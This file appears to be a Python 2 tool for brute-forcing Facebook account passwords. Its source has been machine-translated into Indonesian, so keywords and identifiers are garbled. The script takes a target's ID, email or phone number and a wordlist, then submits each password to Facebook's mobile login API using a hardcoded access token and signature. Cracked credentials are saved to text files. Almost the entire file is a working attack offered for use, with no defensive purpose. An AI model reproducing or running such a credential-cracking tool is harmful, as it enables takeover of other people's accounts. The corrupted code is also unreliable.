import  os , sys , time , datetime , random , json
dari  multiprocessing . pool  impor  ThreadPool
coba :
    impor  mekanik
kecuali  ImportError :
    os . sistem ( 'pip2 install mechanize' )
lain :
    coba :
         permintaan impor
    kecuali  ImportError :
        os . sistem ( 'permintaan pemasangan pip2' )

dari  permintaan . pengecualian  impor  ConnectionError
dari  mekanik,  impor  Browser
muat ulang ( sys )
sys . setdefaultencoding ( 'utf8' )
br  =  mekanik . Peramban ()
br . set_handle_robots ( Salah )
br . set_handle_refresh ( mekanisasi . _http . HTTPRefreshProcessor (), max_time = 1 )
br . addheaders  = [( 'User-Agent' , 'Opera / 9.80 (Android; Opera Mini / 32.0.2254 / 85. U; id) Presto / 2.12.423 Version / 12.16' )]

internet  =  ' \ n \ x1b [33; 1m      \ XE2 \ x95 \ XAD \ XE2 \ x94 \ x81 \ XE2 \ x94 \ x81 \ XE2 \ x94 \ x81 \ XE2 \ x94 \ x81 \ XE2 \ x94 \ x81 \ XE2 \ x94 \ x81 \ XE2 \ x94 \ x81 \ XE2 \ x97 \ xa2 \ XE2 \ x97 \ xa4 \ XE2 \ x94 \ x81 \ XE2 \ x94 \ x81 \ XE2 \ x94 \ x81 \ XE2 \ x94 \ x81 \ XE2 \ x95\ xAE \ n \ x1b [33; 1m      \ XE2 \ x94 \ X83 \ XE2 \ x94 \ x8f \ XE2 \ x94 \ X93 \ XE2 \ x94 \ x8f \ XE2 \ x94 \ x81 \ XE2 \ x94 \ x81 \ XE2 \ x94 \ xb3 \ XE2 \ x97 \ xa2 \ XE2 \ x97 \ xa4 \ XE2 \ x94 \ xb3 \ XE2 \ x94 \ X93 \ XE2 \ x95 \ XB1 \ XE2 \ x95 \ XB1 \ XE2 \ x95 \ XB1 \ XE2 \ x94 \ X83 \ x1b[32; 1m Cheking Acces \ n \ x1b [33; 1m      \ XE2 \ x94 \ X83 \ XE2 \ x94 \ X83 \ XE2 \ x94 \ xa3 \ XE2 \ x94 \ Xab \ XE2 \ x95 \ XB1 \ XE2 \ x95 \ XB1 \ XE2 \ x97 \ xa2 \ XE2 \ x97 \ xa4 \ XE2 \ x95 \ XB1 \ XE2 \ x95 \ XB1 \ XE2 \ x94 \ xa3 \ XE2 \ x94 \ x81 \ XE2 \ x94 \ x81 \ XE2 \ x94 \ x81 \ XE2 \ x94 \ x83\ x1b [32; Internet 1m \ n \ x1b [33; 1m      \ XE2 \ x94 \ X83 \ XE2 \ x94 \ x97 \ XE2 \ x94 \ x9b \ XE2 \ x94 \ x97 \ XE2 \ x94 \ x81 \ XE2 \ x97 \ xa2 \ XE2 \ x97 \ xa4 \ XE2 \ x94 \ xbb \ XE2 \ x94 \ xbb \ XE2 \ x94 \ xbb \ XE2 \ x94 \ x9b \ XE2 \ x95 \ XB1 \ XE2 \ x95 \ XB1 \ XE2 \ x95 \ XB1 \ xe2 \ x94\ X83 \ n \ x1b [33; 1m      \ XE2 \ x95 \ xb0 \ XE2 \ x94 \ x81 \ XE2 \ x94 \ x81 \ XE2 \ x94 \ x81 \ XE2 \ x97 \ xa2 \ XE2 \ x97 \ xa4 \ XE2 \ x94 \ x81 \ XE2 \ x94 \ x81 \ XE2 \ x94 \ x81 \ XE2 \ x94 \ x81 \ XE2 \ x94 \ x81 \ XE2 \ x94 \ x81 \ XE2 \ x94 \ x81 \ XE2 \ x94 \ x81 \ XE2 \ x95 \ XAF \ n\ x1b [35; 1m -------------------------------------- '
spanduk  =  ' \ n \ 033 [31; 1m ____ ____ ____ ____ ___ ____ ____ _ _ \ n | ___ | __ | | | ___ | __] | | | | | _ / \ n \ 033 [37; 1m | | | | ___ | ___ | __] | __ | | __ | | \ _ \ n \ 033 [31; 1m _ _ ____ ____ _ _ ____ ____ \ n           | __ | | __ | | | _ / | ___ | __ / \ n \ 033 [37; 1m | | | | | ___ | \ _ | ___ |  \\ \ n \ 033 [36; 1mDibuat Oleh \ 033 [31; 1m: \ 033 [32; 1m Seluruh grup \ 033 [32; 1m [ \ 033 [37; 1mMr.Gaming \ 033 [32; 1m] \ n \ 033[35; 1m ------------------------------------------ '


def  ceknet ():
    coba :
    	os . sistem ( 'reset' )
        cetak  internet
        cetak  ' \ r \ 033 [37; 1m [ \ x1b [92m + \ 033 [37; 1m] \ 033 [37; 1meriksa Koneksi Internet'
        waktu . tidur ( 2 )
        toolbar_width  =  25
        sys . stdout . tulis ( '[% s]'  % ( '- \ 033 [37; 1m'  *  toolbar_width ))
        sys . stdout . flush ()
        untuk  saya  dalam  jangkauan ( toolbar_width ):
            sys . stdout . tulis ( ' \ r ' )
            sys . stdout . flush ()
            sys . stdout . tulis ( ' \ 033 [37; 1m [' )
            sys . stdout . tulis ( ' \ 033 [36; 1m # \ 033 [37; 1m'  * ( i  +  1 ))
            sys . stdout . flush ()
            waktu . tidur ( 5.0  /  100 )
        coba :
            rq  =  permintaan . dapatkan ( 'http://facebook.com' )
            waktu . tidur ( 3.5 )
            cetak  ' \ 033 [37; 1m] \ 033 [35; 1m ~> \ 033 [32; 1mSucces'
            waktu . tidur ( 2.0 )
            mulai ()
        kecuali  permintaan . pengecualian . ConnectionError :
            waktu . tidur ( 3.5 )
            cetak  ' \ 033 [37; 1m] \ 033 [35; 1m ~> \ 033 [31; 1m Tidak Ada koneksi'
            waktu . tidur ( 1,5 )
            sys . keluar ()

    kecuali  KeyboardInterrupt :
    	waktu . tidur ( 3.5 )
        keluar ( ' \ n \ 033 [37; 1m [ \ x1b [92mx \ 033 [37; 1m] \ 033 [31; 1mProgram berhenti \ n ' )

def  mulai ():
        coba :
            os . sistem ( 'reset' )
            cetak  spanduk
            email  =  input_makan ( ' \ 033 [34; 1m [ \ 033 [37; 1m ~ \ 033 [34; 1m] \ 033 [37; 1m ID \ 033 [36; 1m | \ 033 [37; 1mEmail \ 033 [36] ; 1m | \ 033 [37; 1mHP \ 033 [31; 1m: \ 033 [32; 1m ' )
            sandi batasan  =  raw_input ( ' \ 033 [34; 1m [ \ 033 [37; 1m ~ \ 033 [34; 1m] \ 033 [37; 1m Berkas Wordlist    \ 033 [31; 1m: \ 033 [32; 1m' )
            total  =  terbuka ( sandi , 'r' )
            total  =  total . garis baca ()
            cetak  ' \ 033 [34; 1m [ \ 033 [37; 1m ^ \ 033 [34; 1m] \ 033 [37; 1mTarget \ 033 [36; 1m: \ 033 [32; 1m'  +  email
            waktu . tidur ( 3.0 )
            cetak  ' \ 033 [34; 1m [ \ 033 [37; 1m ^ \ 033 [34; 1m] \ 033 [37; 1mTotal List \ 033 [36; 1m: \ 033 [32; 1m'  +  str ( len ( total ))
            waktu . tidur ( 3.0 )
            mencetak
            sandi  =  open ( passw , 'r' )
            untuk  pw  di  sandi :
                coba :
                    pw  =  pw . ganti ( ' \ n ' , '' )
                    sys . stdout . tulis ( ' \ r \ 033 [32; 1m [ \ 033 [37; 1m = \ 033 [32; 1m] \ 033 [34; 1m Start \ 033 [37; 1m> \ 033 [35; 1m' + email + ' \ 033 [37; 1m> \ 033 [35; 1m' + pw )
                    sys . stdout . flush ()
                    data  =  permintaan . mendapatkan ( 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email='  +  email  +  '& locale = en_US & password ='  +  pw  +  '& sdk = ios & generate_session_cookies = 1 & sig = 3f555f99fb61fcd7aa0c44f58f522ef6 ' )
                    mpsh  =  json . memuat ( data . teks )
                    jika  'access_token'  di  mpsh :
                        dapat  =  terbuka ( 'succes.txt' , 'w' )
                        dapat . tulis ( '[ID] =>'  +  email  +  ' \ n ' )
                        dapat . tulis ( '[PW] =>'  +  pw )
                        dapat . dekat ()
                        cetak  ' \ n \ n \ 033 [32; 1m [+] \ 033 [37; 1mPASSWORD FOUND [Mr.Gaming]'
                        cetak  ' \ 033 [32; 1m [+] \ 033 [37; 1mNama Pengguna \ 033 [32; 1m: \ 033 [35; 1m' + email
                        cetak  ' \ 033 [32; 1m [+] \ 033 [37; 1mPassword \ 033 [32; 1m: \ 033 [35; 1m' + pw
                        cetak  ' \ 033 [32; 1m [+] \ 033 [37; 1mStatus    \ 033 [32; 1m: \ 033 [32; 1m SUCCES' '
                        cetak  ' \ 033 [32; 1m [=] \ 033 [37; 1mProgram Selesai'
                        sys . keluar ()
                    lain :
                        jika  'www.facebook.com'  di  mpsh [ 'error_msg' ]:
                            ceks  =  open ( 'succesCP.txt' , 'w' )
                            ceks . tulis ( '[ID] =>'  +  email  +  ' \ n ' )
                            ceks . tulis ( '[PW] =>'  +  pw )
                            ceks . dekat ()
                            cetak  ' \ n \ n \ 033 [33; 1m [+] \ 033 [37; 1mPASSWORD FOUND [Mr.Gaming]'
                            cetak  ' \ 033 [33; 1m [+] \ 033 [37; 1mNama Pengguna \ 033 [32; 1m: \ 033 [35; 1m' + email
                            cetak  ' \ 033 [33; 1m [+] \ 033 [37; 1mPassword \ 033 [32; 1m: \ 033 [35; 1m' + pw
                            cetak  ' \ 033 [33; 1m [+] \ 033 [37; 1mStatus    \ 033 [32; 1m: \ 033 [33; 1m CHEKPOINT'
                            cetak  ' \ 033 [33; 1m [=] \ 033 [37; 1mProgram Selesai'
                            sys . keluar ()
                kecuali  permintaan . pengecualian . ConnectionError :
                    cetak  ' \ 033 [37; 1m [ \ 033 [32; 1mx \ 033 [37; 1m] \ 033 [31; 1mkoneksi error'
                    sys . keluar ()

        kecuali  IOError :
            cetak  ' \ 033 [37; 1m [ \ 033 [32; 1mx \ 033 [37; 1m] \ 033 [37; 1mAlamat daftar kata tidak ada'
            cetak  ' \ 033 [37; 1m [ \ 033 [32; 1mx \ 033 [37; 1m] \ 033 [37; 1mSaya rekomendasi Untuk Membuatnya sendiri' '
            sys . keluar ()

ceknet ()
